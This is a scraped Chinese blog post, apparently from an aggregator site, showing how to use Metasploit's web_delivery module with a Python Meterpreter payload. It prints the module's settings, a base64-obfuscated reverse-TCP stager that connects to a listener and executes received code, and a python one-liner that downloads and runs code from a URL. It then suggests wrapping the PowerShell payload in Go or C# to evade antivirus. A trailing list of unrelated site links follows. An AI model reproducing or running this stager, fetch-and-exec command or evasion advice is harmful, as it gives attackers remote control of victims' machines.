Pyhton加载Meterpreter Web_delivery代码
来源:互联网 发布:经典的爱情电影 知乎 编辑:程序博客网 时间:2024/06/10 00:42
Webdelivery的options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 127.0.0.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Python
生成的文件内容
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMjcuMC4wLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))
调用命令
python -c "import urllib2; r = urllib2.urlopen('http://127.0.0.1:8080/test'); exec(r.read());"
使用PowerShell执行的payload语句可以封装到golang或者C#中实现免杀的目的
阅读全文
0 0
- Pyhton加载Meterpreter Web_delivery代码
- Msf - web_delivery
- Metasploit应用笔记-msfvenom生成meterpreter后门代码
- DMZ下使用web_delivery 介绍
- 初探Meterpreter
- metasploit - meterpreter
- Meterpreter Guide
- Meterpreter初探
- Meterpreter Guide
- 初探Meterpreter
- Meterpreter Backdoor
- meterpreter 命令
- meterpreter 内置工具
- Meterpreter 脚本列表
- Metasploit - Android meterpreter
- metasploit - meterpreter commands (windows)
- metasploit - meterpreter commands (linux)
- metasploit - java meterpreter
- hibernate中的addEntity setResultTransformer的比较
- Struts2 action接收json格式字符串并转化为Map
- 彻底解决eclipse检出maven 以及maven项目报错的问题
- 通过jstat实时检测JVM内存变化
- windows下安装php扩展
- Pyhton加载Meterpreter Web_delivery代码
- 波司登全国超千家门店,销售状况如何实时监控?
- MySQL学习笔记
- 你所不知道的JSON
- 几行代码帮你轻松完成ios屏幕适配
- nginx安装与使用
- 关于pycharm ImportError: No module named caffe
- Dubbo--简单介绍和使用(Simple)
- 晒往期云栖大会的照片或感想_赢2017杭州云栖大会门票